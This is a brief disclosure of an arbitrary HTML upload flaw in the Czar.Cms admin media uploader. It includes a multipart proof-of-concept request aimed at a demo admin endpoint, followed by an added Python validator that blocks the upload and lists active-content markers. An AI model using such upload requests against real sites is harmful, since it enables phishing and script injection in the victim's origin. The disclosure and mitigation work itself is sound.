Czar.Cms
Arbitrary file upload vulnerability exists in the background
Can upload HTML
Causes phishing attacks, JavaScript code execution
url: http://demo.zkea.net/admin/media/upload
poc:
-----------------------------189153225812082
Content-Disposition: form-data; name="file"; filename="test.html"
Content-Type: application/octet-stream

hello world!
-----------------------------189153225812082
Content-Disposition: form-data; name="parentId"

-----------------------------189153225812082
Content-Disposition: form-data; name="size"

14
-----------------------------189153225812082--
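
A server-side check that rejects the upload in the PoC above, shown as an added example that is not part of the original report and is not Czar.Cms code. The allowlist, the marker list and the names `check_upload` and `response_headers` are assumptions chosen for illustration.

```python
import os

# Assumed policy for a media library: extensions the application agrees to store.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}
# Magic bytes expected at the start of each allowed type.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".pdf": (b"%PDF-",),
}
# Markers that indicate browser-renderable active content.
ACTIVE_MARKERS = (b"<html", b"<script", b"<svg", b"<!doctype", b"<iframe")


def check_upload(filename, declared_type, data):
    """Return (accepted, reason). declared_type is ignored on purpose:
    the PoC sends test.html as application/octet-stream, so the
    client-supplied Content-Type says nothing about the file."""
    name = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext or '(none)'} not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    if any(m in data[:1024].lower() for m in ACTIVE_MARKERS):
        return False, "active content marker found"
    return True, "ok"


def response_headers(stored_name):
    """Headers for serving stored uploads so a browser downloads them
    instead of rendering them in the site's origin.
    stored_name is assumed to be generated by the server, not user input."""
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{stored_name}"',
        "X-Content-Type-Options": "nosniff",
    }


# Constructed inputs: the file part from the PoC and a minimal PNG header.
POC = ("test.html", "application/octet-stream", b"hello world!\r\n")
PNG = ("logo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)

if __name__ == "__main__":
    for sample in (POC, PNG):
        print(sample[0], check_upload(*sample))
```

The extension check alone stops the PoC; the magic-byte check covers HTML saved under an allowed extension, and the response headers keep a stored file from rendering in the site's origin if one slips through.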